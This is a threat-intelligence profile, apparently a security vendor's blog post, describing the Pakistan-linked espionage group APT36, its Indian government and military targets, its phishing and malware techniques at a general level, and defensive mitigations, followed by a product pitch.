Dark Web Profile: APT36

APT36 is a Pakistan-linked state-sponsored cyber-espionage group active since at least 2013. With a persistent focus on Indian military, diplomatic, and critical infrastructure targets, APT36 conducts long-term intelligence-gathering operations using phishing, remote-access trojans, and deceptive infrastructure. Despite modest technical sophistication, the group is highly adaptive, leveraging new platforms and cloud services, and malvertising campaigns to remain effective across South Asia’s geopolitical threat landscape.

Who is APT36?

APT36, also known by aliases such as Transparent Tribe, Mythic Leopard, Earth Karkaddan, ProjectM, and COPPER FIELDSTONE (yes, it’s time we agreed on just one name), is a Pakistani state-aligned cyber-espionage group active since at least 2013. Believed to be operating on behalf of Pakistan’s military or intelligence services, the group has a long history of targeting Indian government, military, and defense-related organizations. APT36’s operations have been consistently attributed to strategic state interests, particularly concerning India and regional adversaries.

Threat actor card for APT36

Despite lacking the sophistication of top-tier APT groups, APT36 is highly persistent and adaptive. It frequently modifies its malware toolset, often using off-the-shelf RATs alongside custom-developed implants. The group’s infrastructure and attack campaigns frequently reveal operational traits tied to Pakistani time zones and network providers; they even do this intentionally.

What are APT36’s Targets?

APT36 primarily targets Indian government bodies, defense contractors, armed forces, diplomatic missions, and research institutions. Over time, it has expanded to include India’s educational sector and aerospace industry. The Indian Computer Emergency Response Team (CERT-In), along with local authorities like the Chandigarh Police, has warned about APT36’s renewed activity in 2025 – specifically targeting Indian defense and research networks through phishing emails, fake government portals, and malicious mobile apps.

Map showing countries targeted by APT36 (created with MapChart)

Key victim categories include:

• Primary Targets:
  • Indian military and intelligence personnel
  • Government ministries and officials
  • Aerospace and defense contractors
  • Educational and research institutions
• Secondary Targets:
  • Afghan military and government entities
  • Pakistani dissidents and journalists (domestically monitored)
  • Opportunistic attacks in Sri Lanka, Nepal, the US, and the UK.

APT36 aligns its campaigns with geopolitical developments (e.g., India-Pakistan border conflicts, terror incidents), and often crafts highly tailored lures for Indian targets, like COVID-19 health advisories, fake MFA portals, or government documents.

What are APT36’s Techniques?

Over the years, the group’s tactics have evolved from basic spear-phishing with Crimson RAT to a diversified toolkit in 2023 – 2025 that spans multiple platforms (Windows, Linux, Android) and leverages modern techniques.

APT36 Cyber Attack Lifecycle

Initial Access: Spear-Phishing, Spoofed Sites, and Malvertising

APT36’s primary entry method remains spear-phishing, often using real-world geopolitical or military events to add urgency and authenticity. Recent campaigns have weaponized documents referencing incidents like the April 2025 Pahalgam terror attack. These lures included PDFs containing links to spoofed Jammu & Kashmir Police or Indian Air Force login pages that captured credentials and initiated malware delivery.

Reflections of the India–Pakistan Kashmir Escalation on the Cyber World: Count of Dark Web mentions related to India over the years, cyber attacks, leaks, sales and more

The group also creates fake domains that mimic Indian government services, such as NIC and MFA portals like Kavach. In some cases, they use Google Ads in malvertising campaigns to drive victims to these clone sites. Here, backdoored installers are offered to victims searching for trusted apps – leading to infection by Crimson RAT or data stealers like Limepad.

Their social engineering payloads are typically embedded in:

• Malicious Office files with macros or OLE objects
• Weaponized ISO or ZIP attachments
• Deceptive PowerPoint Add-Ins (PPAM)
• PDFs with embedded credential-stealing links

These vectors deliver the initial malware, most commonly Crimson RAT or ElizaRAT.

Execution & Payload Delivery: Expanding Arsenal of RATs and Stealers

APT36’s payloads range from legacy tools like Crimson RAT to newer, modular and cloud-integrated implants. Key malware families include:

• Crimson RAT – Their long-used Windows RAT, offering surveillance, data exfiltration, and persistent access. Frequently delivered via Office attachments.
• ObliqueRAT – Often deployed alongside Crimson, sometimes hidden in images or via compromised websites.
• CapraRAT – An Android spyware implant disguised inside fake chat or social apps, capable of stealing messages, contacts, GPS data, and recordings.
• ElizaRAT – A .NET-based RAT dropped via malicious Control Panel files (.CPL). It includes checks for geographic targeting (India Standard Time) and uses cloud-based command-and-control.
• ApoloStealer – A second-stage Windows payload that catalogs and exfiltrates document files. Often fetched by ElizaRAT.
• Poseidon – A Linux-focused RAT designed for use against India’s MayaOS defense deployments, delivered through trojanized apps.
• USBWorm & USBStealer – Tools designed to spread via USB and steal files from removable drives, bridging air-gapped systems.

APT36 typically executes these payloads through methods such as LNK shortcuts, registry keys, and scheduled tasks. ElizaRAT also employs .NET packers and opens decoy content (videos, documents) during execution to distract the user.

Persistence and Defense Evasion

To maintain access:

• Malware establishes persistence via Registry Run keys, Startup folders, or scheduled tasks.
• Files are disguised with benign names and extensions (e.g., .jpg, Spotify.dll).
• Many tools execute only if the system is in India’s time zone, reducing exposure.
• Decoys like news articles or video files are opened to distract the user while malware runs.
• Some samples create local databases (e.g., SQLite) to stage data before exfiltration.

APT36’s newer malware often remains fileless, executes in memory, and uses legitimate tools like rundll32, mshta, or COM interfaces to reduce detection.

Command-and-Control (C2) and Infrastructure

APT36 has moved from static C2 infrastructure to a hybrid model:

• Early variants used attacker-controlled IPs/domains, often hosted via cheap VPS services.
• Recent tools use Telegram bots, Slack APIs, Google Drive, and Discord for encrypted C2 and exfiltration.
• C2 traffic is often disguised as HTTPS connections to legitimate services, evading firewall detection.
• Some implants rotate infrastructure frequently or embed decoy IPs to mislead analysts.

Their cloud-based C2 channels allow them to blend malicious activity with normal business traffic, complicating detection.

Lateral Movement and Propagation

APT36’s campaigns are often designed to minimize lateral movement, focusing on multiple direct infections via phishing. However, they demonstrate capability for lateral movement through:

• Credential harvesting and internal phishing using stolen email accounts.
• Keylogging and browser session theft via Discord-based stealers.
• Use of PsExec and WMI where needed to execute commands remotely.
• USB worming to infect air-gapped or isolated networks.

They rarely exploit vulnerabilities for lateral movement, instead relying on valid credentials or social engineering.

Data Collection and Exfiltration

APT36’s ultimate goal is cyber espionage – harvesting military, political, and academic intelligence:

• Keylogging and screenshot capture track user behavior and steal credentials.
• ApoloStealer and other tools scan for Office files, PDFs, images, and compress or encrypt them before exfiltration.
• Browser data and session cookies are stolen to hijack authenticated sessions.
• Exfiltration uses Slack, Google APIs, Telegram bots, or direct HTTPS POST requests.
• Some campaigns stage data in local SQLite databases before uploading to C2.
• USB-based malware collects files from removable media for delayed exfiltration.

The group often sets victim identifiers and logs for tracking, ensuring operational clarity even across multiple infections.

What are the Mitigation Tactics Against APT36?

Organizations can reduce exposure to APT36 by implementing layered defenses and targeted detection strategies:

1. Email & Attachment Controls:
   • Block macro-enabled Office files by default.
   • Use sandboxing to analyze suspicious attachments.
2. Web Filtering & Domain Monitoring:
   • Monitor DNS queries to typosquatted government domains.
   • Block known malicious infrastructure tied to APT36.
3. Endpoint Detection & Behavior Analysis:
   • Deploy EDR tools with anomaly-based detection (e.g., time-zone checks, Office process spawning command shells).
4. Credential Hygiene & MFA Enforcement:
   • Rotate credentials frequently.
   • Use phishing-resistant MFA methods and verify MFA app authenticity.
5. Cloud Service Hardening:
   • Audit use of services like Telegram, Slack, and Google Drive on enterprise endpoints.
6. Education Sector Security Awareness:
   • Train students and staff to identify academic-themed phishing lures and malicious attachments.

How Can SOCRadar Help?

SOCRadar offers an integrated suite of solutions tailored to defend against actors like APT36:

• Threat Actor Tracking: Maintain visibility into evolving APT campaigns, tools, and infrastructure.
• Dark Web Monitoring: Detect references to stolen credentials or targeted organizations on hacker forums and marketplaces.
• Extended Threat Intelligence:
  • Access IoCs and TTPs related to threat actors.
  • Enrich SIEM/EDR rules with real-time context.
• Cloud Infrastructure Defense: Identify misuse of legitimate cloud services for exfiltration or C2.

By leveraging SOCRadar’s unified intelligence capabilities, organizations can improve detection, response, and resilience against threat actor’s persistent operations.

What are the MITRE ATT&CK TTPs of APT36?

Tools and Malware